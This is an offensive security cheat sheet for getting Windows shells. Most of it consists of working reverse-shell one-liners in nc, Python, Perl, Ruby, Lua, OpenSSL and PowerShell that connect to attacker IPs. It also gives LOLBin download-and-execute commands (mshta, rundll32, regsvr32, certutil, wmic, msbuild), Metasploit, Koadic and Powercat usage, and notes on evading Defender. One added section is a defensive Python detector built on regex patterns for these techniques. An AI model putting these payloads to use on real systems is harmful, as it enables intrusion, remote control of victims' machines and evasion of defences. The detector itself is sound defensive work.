
Shells - Windows

{% hint style="success" %} Learn & practice AWS Hacking: HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks
{% endhint %}

Try Hard Security Group

{% embed url="https://discord.gg/tryhardsecurity" %}


Lolbas

The page lolbas-project.github.io is for Windows what https://gtfobins.github.io/ is for Linux.
Obviously, there are no SUID files or sudo privileges in Windows, but it is useful to know how some binaries can be (ab)used to perform unexpected actions such as executing arbitrary code.

NC

nc.exe -e cmd.exe <Attacker_IP> <PORT>

SBD

sbd is a portable and secure Netcat alternative. It works on Unix-like systems and Win32. With features such as strong encryption, program execution, customizable source ports, and continuous reconnection, sbd provides a versatile solution for TCP/IP communication. For Windows users, the sbd.exe version shipped with the Kali Linux distribution can be used as a reliable Netcat replacement.

# Victim's machine
sbd -l -p 4444 -e bash -v -n
listening on port 4444


# Attacker's machine
sbd 10.10.10.10 4444
id
uid=0(root) gid=0(root) groups=0(root)

Python

#Windows
C:\Python27\python.exe -c "(lambda __y, __g, __contextlib: [[[[[[[(s.connect(('10.11.0.37', 4444)), [[[(s2p_thread.start(), [[(p2s_thread.start(), (lambda __out: (lambda __ctx: [__ctx.__enter__(), __ctx.__exit__(None, None, None), __out[0](lambda: None)][2])(__contextlib.nested(type('except', (), {'__enter__': lambda self: None, '__exit__': lambda __self, __exctype, __value, __traceback: __exctype is not None and (issubclass(__exctype, KeyboardInterrupt) and [True for __out[0] in [((s.close(), lambda after: after())[1])]][0])})(), type('try', (), {'__enter__': lambda self: None, '__exit__': lambda __self, __exctype, __value, __traceback: [False for __out[0] in [((p.wait(), (lambda __after: __after()))[1])]][0]})())))([None]))[1] for p2s_thread.daemon in [(True)]][0] for __g['p2s_thread'] in [(threading.Thread(target=p2s, args=[s, p]))]][0])[1] for s2p_thread.daemon in [(True)]][0] for __g['s2p_thread'] in [(threading.Thread(target=s2p, args=[s, p]))]][0] for __g['p'] in [(subprocess.Popen(['\\windows\\system32\\cmd.exe'], stdout=subprocess.PIPE, stderr=subprocess.STDOUT, stdin=subprocess.PIPE))]][0])[1] for __g['s'] in [(socket.socket(socket.AF_INET, socket.SOCK_STREAM))]][0] for __g['p2s'], p2s.__name__ in [(lambda s, p: (lambda __l: [(lambda __after: __y(lambda __this: lambda: (__l['s'].send(__l['p'].stdout.read(1)), __this())[1] if True else __after())())(lambda: None) for __l['s'], __l['p'] in [(s, p)]][0])({}), 'p2s')]][0] for __g['s2p'], s2p.__name__ in [(lambda s, p: (lambda __l: [(lambda __after: __y(lambda __this: lambda: [(lambda __after: (__l['p'].stdin.write(__l['data']), __after())[1] if (len(__l['data']) > 0) else __after())(lambda: __this()) for __l['data'] in [(__l['s'].recv(1024))]][0] if True else __after())())(lambda: None) for __l['s'], __l['p'] in [(s, p)]][0])({}), 's2p')]][0] for __g['os'] in [(__import__('os', __g, __g))]][0] for __g['socket'] in [(__import__('socket', __g, __g))]][0] for __g['subprocess'] in [(__import__('subprocess', __g, __g))]][0] for __g['threading'] in [(__import__('threading', __g, __g))]][0])((lambda f: (lambda x: x(x))(lambda y: f(lambda: y(y)()))), globals(), __import__('contextlib'))"

Perl

perl -e 'use Socket;$i="ATTACKING-IP";$p=80;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
perl -MIO -e '$c=new IO::Socket::INET(PeerAddr,"ATTACKING-IP:80");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'

Ruby

#Windows
ruby -rsocket -e 'c=TCPSocket.new("[IPADDR]","[PORT]");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end'

Lua

lua5.1 -e 'local host, port = "127.0.0.1", 4444 local socket = require("socket") local tcp = socket.tcp() local io = require("io") tcp:connect(host, port); while true do local cmd, status, partial = tcp:receive() local f = io.popen(cmd, "r") local s = f:read("*a") f:close() tcp:send(s) if status == "closed" then break end end tcp:close()'

OpenSSL

Attacker (Kali)

openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes #Generate certificate
openssl s_server -quiet -key key.pem -cert cert.pem -port <l_port> #Here you will be able to introduce the commands
openssl s_server -quiet -key key.pem -cert cert.pem -port <l_port2> #Here you will be able to get the response

Victim


#Linux
openssl s_client -quiet -connect <ATTACKER_IP>:<PORT1>|/bin/bash|openssl s_client -quiet -connect <ATTACKER_IP>:<PORT2>

#Windows
openssl.exe s_client -quiet -connect <ATTACKER_IP>:<PORT1>|cmd.exe|openssl s_client -quiet -connect <ATTACKER_IP>:<PORT2>

Powershell

powershell -exec bypass -c "(New-Object Net.WebClient).Proxy.Credentials=[Net.CredentialCache]::DefaultNetworkCredentials;iwr('http://10.2.0.5/shell.ps1')|iex"
powershell "IEX(New-Object Net.WebClient).downloadString('http://10.10.14.9:8000/ipw.ps1')"
Start-Process -NoNewWindow powershell "IEX(New-Object Net.WebClient).downloadString('http://10.222.0.26:8000/ipst.ps1')"
echo IEX(New-Object Net.WebClient).DownloadString('http://10.10.14.13:8000/PowerUp.ps1') | powershell -noprofile

Process performing the network call: powershell.exe
Payload written on disk: NO (at least nowhere I could find using procmon!)

powershell -exec bypass -f \\webdavserver\folder\payload.ps1

Process performing the network call: svchost.exe
Payload written on disk: WebDAV client local cache

$client = New-Object System.Net.Sockets.TCPClient("10.10.10.10",80);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2  = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()

Get more information about different Powershell shells at the end of this document

Mshta

mshta vbscript:Close(Execute("GetObject(""script:http://webserver/payload.sct"")"))
mshta http://webserver/payload.hta
mshta \\webdavserver\folder\payload.hta

Example of an hta-psh reverse shell (uses hta to download and execute a PS backdoor)

<scRipt language="VBscRipT">CreateObject("WscrIpt.SheLL").Run "powershell -ep bypass -w hidden IEX (New-ObjEct System.Net.Webclient).DownloadString('http://119.91.129.12:8080/1.ps1')"</scRipt>

You can very easily download and execute a Koadic zombie using the stager hta

hta example

From here

<html>
<head>
<HTA:APPLICATION ID="HelloExample">
<script language="jscript">
var c = "cmd.exe /c calc.exe";
new ActiveXObject('WScript.Shell').Run(c);
</script>
</head>
<body>
<script>self.close();</script>
</body>
</html>

mshta - sct

From here

<?XML version="1.0"?>
<!-- rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";o=GetObject("script:http://webserver/scriplet.sct");window.close();  -->
<!-- mshta vbscript:Close(Execute("GetObject(""script:http://webserver/scriplet.sct"")")) -->
<!-- mshta vbscript:Close(Execute("GetObject(""script:C:\local\path\scriptlet.sct"")")) -->
<scriptlet>
<public>
</public>
<script language="JScript">
<![CDATA[
var r = new ActiveXObject("WScript.Shell").Run("calc.exe");
]]>
</script>
</scriptlet>

Mshta - Metasploit

use exploit/windows/misc/hta_server
msf exploit(windows/misc/hta_server) > set srvhost 192.168.1.109
msf exploit(windows/misc/hta_server) > set lhost 192.168.1.109
msf exploit(windows/misc/hta_server) > exploit
Victim> mshta.exe //192.168.1.109:8080/5EEiDSd70ET0k.hta #The file name is given in the output of metasploit

Detected by Defender

Rundll32

DLL hello world example

rundll32 \\webdavserver\folder\payload.dll,entrypoint
rundll32.exe javascript:"\..\mshtml,RunHTMLApplication";o=GetObject("script:http://webserver/payload.sct");window.close();

Detected by Defender

Rundll32 - sct

From here

<?XML version="1.0"?>
<!-- rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";o=GetObject("script:http://webserver/scriplet.sct");window.close();  -->
<!-- mshta vbscript:Close(Execute("GetObject(""script:http://webserver/scriplet.sct"")")) -->
<scriptlet>
<public>
</public>
<script language="JScript">
<![CDATA[
var r = new ActiveXObject("WScript.Shell").Run("calc.exe");
]]>
</script>
</scriptlet>

Rundll32 - Metasploit

use windows/smb/smb_delivery
run
#You will be given the command to run in the victim: rundll32.exe \\10.2.0.5\Iwvc\test.dll,0

Rundll32 - Koadic

use stager/js/rundll32_js
set SRVHOST 192.168.1.107
set ENDPOINT sales
run
#Koadic will tell you what you need to execute inside the victim, it will be something like:
rundll32.exe javascript:"\..\mshtml, RunHTMLApplication ";x=new%20ActiveXObject("Msxml2.ServerXMLHTTP.6.0");x.open("GET","http://10.2.0.5:9997/ownmG",false);x.send();eval(x.responseText);window.close();

Regsvr32

regsvr32 /u /n /s /i:http://webserver/payload.sct scrobj.dll
regsvr32 /u /n /s /i:\\webdavserver\folder\payload.sct scrobj.dll

Detected by Defender

Regsvr32 -sct

From here

<?XML version="1.0"?>
<!-- regsvr32 /u /n /s /i:http://webserver/regsvr32.sct scrobj.dll -->
<!-- regsvr32 /u /n /s /i:\\webdavserver\folder\regsvr32.sct scrobj.dll -->
<scriptlet>
<registration
progid="PoC"
classid="{10001111-0000-0000-0000-0000FEEDACDC}" >
<script language="JScript">
<![CDATA[
var r = new ActiveXObject("WScript.Shell").Run("calc.exe");
]]>
</script>
</registration>
</scriptlet>

Regsvr32 - Metasploit

use multi/script/web_delivery
set target 3
set payload windows/meterpreter/reverse/tcp
set lhost 10.2.0.5
run
#You will be given the command to run in the victim: regsvr32 /s /n /u /i:http://10.2.0.5:8080/82j8mC8JBblt.sct scrobj.dll

You can very easily download and execute a Koadic zombie using the stager regsvr

Certutil

Download a B64 DLL, decode it and execute it.

certutil -urlcache -split -f http://webserver/payload.b64 payload.b64 & certutil -decode payload.b64 payload.dll & C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil /logfile= /LogToConsole=false /u payload.dll

Download a B64 EXE, decode it and execute it.

certutil -urlcache -split -f http://webserver/payload.b64 payload.b64 & certutil -decode payload.b64 payload.exe & payload.exe

Detected by Defender

Cscript/Wscript

powershell.exe -c "(New-Object System.NET.WebClient).DownloadFile('http://10.2.0.5:8000/reverse_shell.vbs',\"$env:temp\test.vbs\");Start-Process %windir%\system32\cscript.exe \"$env:temp\test.vbs\""

Cscript - Metasploit

msfvenom -p cmd/windows/reverse_powershell lhost=10.2.0.5 lport=4444 -f vbs > shell.vbs

Detected by Defender

PS-Bat

\\webdavserver\folder\batchfile.bat

Process performing the network call: svchost.exe
Payload written on disk: WebDAV client local cache

msfvenom -p cmd/windows/reverse_powershell lhost=10.2.0.5 lport=4444 > shell.bat
impacket-smbserver -smb2support kali `pwd`
\\10.8.0.3\kali\shell.bat

Detected by Defender

MSIExec

Attacker

msfvenom -p windows/meterpreter/reverse_tcp lhost=10.2.0.5 lport=1234 -f msi > shell.msi
python -m SimpleHTTPServer 80

Victim:

victim> msiexec /quiet /i \\10.2.0.5\kali\shell.msi

Detected

Wmic

wmic os get /format:"https://webserver/payload.xsl"

Example xsl file from here:

<?xml version='1.0'?>
<stylesheet xmlns="http://www.w3.org/1999/XSL/Transform" xmlns:ms="urn:schemas-microsoft-com:xslt" xmlns:user="placeholder" version="1.0">
<output method="text"/>
<ms:script implements-prefix="user" language="JScript">
<![CDATA[
var r = new ActiveXObject("WScript.Shell").Run("cmd.exe /c echo IEX(New-Object Net.WebClient).DownloadString('http://10.2.0.5/shell.ps1') | powershell -noprofile -");
]]>
</ms:script>
</stylesheet>

Not detected

You can very easily download and execute a Koadic zombie using the stager wmic

Msbuild

cmd /V /c "set MB="C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe" & !MB! /noautoresponse /preprocess \\webdavserver\folder\payload.xml > payload.xml & !MB! payload.xml"

You can use this technique to bypass Application Whitelisting and Powershell.exe restrictions, as you will be prompted with a PS shell.
Just download and execute this: https://raw.githubusercontent.com/Cn33liz/MSBuildShell/master/MSBuildShell.csproj

C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe MSBuildShell.csproj

Not detected

CSC

Compile C# code on the victim's machine.

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe /unsafe /out:shell.exe shell.cs

You can download a basic C# reverse shell from here: https://gist.github.com/BankSecurity/55faad0d0c4259c623147db79b2a83cc

Not detected

Regasm/Regsvc

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\regasm.exe /u \\webdavserver\folder\payload.dll

I haven't tried it

https://gist.github.com/Arno0x/71ea3afb412ec1a5490c657e58449182

Odbcconf

odbcconf /s /a {regsvr \\webdavserver\folder\payload_dll.txt}

I haven't tried it

https://gist.github.com/Arno0x/45043f0676a55baf484cbcd080bbf7c2
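The LOLBin launch patterns catalogued above (mshta, rundll32, regsvr32, certutil, msiexec, wmic, msbuild) are a concrete set of process-creation signatures for a defender, independent of the "detected / not detected" notes, which only reflect Defender's AV engine. Added example, not from the HackTricks page: a Python triage helper that tags Sysmon-style command lines against those patterns; the rule names and the sample command lines are constructed for this example.

```python
import re

# Command-line patterns for the LOLBin launch techniques listed on this page.
# Each rule: (technique name, compiled regex over the full command line).
LOLBIN_RULES = [
    ("mshta remote/scriptlet payload",
     re.compile(r"\bmshta(\.exe)?\b.*(https?:|\\\\|vbscript:|javascript:|script:)", re.I)),
    ("rundll32 javascript/RunHTMLApplication",
     re.compile(r"\brundll32(\.exe)?\b.*(javascript:|RunHTMLApplication)", re.I)),
    ("regsvr32 scrobj.dll scriptlet",
     re.compile(r"\bregsvr32(\.exe)?\b.*/i:\S+.*scrobj\.dll", re.I)),
    ("certutil download or decode",
     re.compile(r"\bcertutil(\.exe)?\b.*-(urlcache|decode)\b", re.I)),
    ("msiexec install from remote/UNC path",
     re.compile(r"\bmsiexec(\.exe)?\b.*/i\s+(https?:|\\\\)", re.I)),
    ("wmic remote XSL stylesheet",
     re.compile(r"\bwmic(\.exe)?\b.*/format:\S*(https?:|\\\\)", re.I)),
    ("msbuild project from UNC/WebDAV path",
     re.compile(r"\bmsbuild(\.exe)?\b.*\\\\\S+\.(xml|csproj)", re.I)),
]

def classify(cmdline):
    """Return the technique names whose pattern matches one command line."""
    return [name for name, rx in LOLBIN_RULES if rx.search(cmdline)]

def triage(lines):
    """Map each suspicious command line to its techniques; benign lines are dropped."""
    hits = {}
    for line in lines:
        found = classify(line)
        if found:
            hits[line] = found
    return hits

# Constructed sample process-creation command lines (not real telemetry).
SAMPLE_CMDLINES = [
    r'mshta vbscript:Close(Execute("GetObject(""script:http://webserver/payload.sct"")"))',
    r'regsvr32 /u /n /s /i:http://webserver/payload.sct scrobj.dll',
    r'rundll32.exe javascript:"\..\mshtml,RunHTMLApplication";o=GetObject("script:http://webserver/payload.sct")',
    r'certutil -urlcache -split -f http://webserver/payload.b64 payload.b64',
    r'wmic os get /format:"https://webserver/payload.xsl"',
    r'msiexec /quiet /i \\10.2.0.5\kali\shell.msi',
    r'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe /preprocess \\webdavserver\folder\payload.xml',
    r'regsvr32 /s C:\Program Files\Vendor\legit.dll',  # benign: local DLL, no /i: scriptlet
    r'certutil -verify C:\certs\server.cer',            # benign: certificate verification
    r'wmic os get caption,version',                      # benign: no remote stylesheet
]

if __name__ == "__main__":
    for cmd, techniques in triage(SAMPLE_CMDLINES).items():
        print(f"{', '.join(techniques)}: {cmd}")
```

Running it flags the seven suspicious lines with exactly one technique each and leaves the three benign ones untouched; the rules are a starting point to tune against your own baseline, not a replacement for endpoint telemetry.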

Powershell Shells

PS-Nishang

https://github.com/samratashok/nishang

In the Shells folder there are many different shells. To download and execute Invoke-PowerShellTcp.ps1, make a copy of the script and append to the end of the file:

Invoke-PowerShellTcp -Reverse -IPAddress 10.2.0.5 -Port 4444

Start serving the script on a web server and execute it on the victim's side:

powershell -exec bypass -c "iwr('http://10.11.0.134/shell2.ps1')|iex"

Defender doesn't detect it as malicious code (yet, 3/04/2019).

TODO: Check other nishang shells

PS-Powercat

https://github.com/besimorhino/powercat

Download it, start a web server, start the listener, and execute it on the victim's side:

powershell -exec bypass -c "iwr('http://10.2.0.5/powercat.ps1')|iex;powercat -c 10.2.0.5 -p 4444 -e cmd"

Defender doesn't detect it as malicious code (yet, 3/04/2019).

Other options offered by powercat:

Bind shells, Reverse shell (TCP, UDP, DNS), Port redirect, upload/download, Generate payloads, Serve files...

Serve a cmd Shell:
powercat -l -p 443 -e cmd
Send a cmd Shell:
powercat -c 10.1.1.1 -p 443 -e cmd
Send a powershell:
powercat -c 10.1.1.1 -p 443 -ep
Send a powershell UDP:
powercat -c 10.1.1.1 -p 443 -ep -u
TCP Listener to TCP Client Relay:
powercat -l -p 8000 -r tcp:10.1.1.16:443
Generate a reverse tcp payload which connects back to 10.1.1.15 port 443:
powercat -c 10.1.1.15 -p 443 -e cmd -g
Start A Persistent Server That Serves a File:
powercat -l -p 443 -i C:\inputfile -rep

Empire

https://github.com/EmpireProject/Empire

Create a powershell launcher, save it in a file, then download and execute it.

powershell -exec bypass -c "iwr('http://10.2.0.5/launcher.ps1')|iex;powercat -c 10.2.0.5 -p 4444 -e cmd"

Detected as malicious code

MSF-Unicorn

https://github.com/trustedsec/unicorn

Create a powershell version of a metasploit backdoor using unicorn

python unicorn.py windows/meterpreter/reverse_https 10.2.0.5 443

Start msfconsole with the created resource file:

msfconsole -r unicorn.rc

Start a web server serving the powershell_attack.txt file and execute it on the victim:

powershell -exec bypass -c "iwr('http://10.2.0.5/powershell_attack.txt')|iex"

Detected as malicious code

More

PS>Attack PS console with some offensive PS modules preloaded (encoded)
https://gist.github.com/NickTyrer/92344766f1d4d48b15687e5e4bf6f9
WinPWN
PS console with some offensive PS modules and proxy detection (IEX)
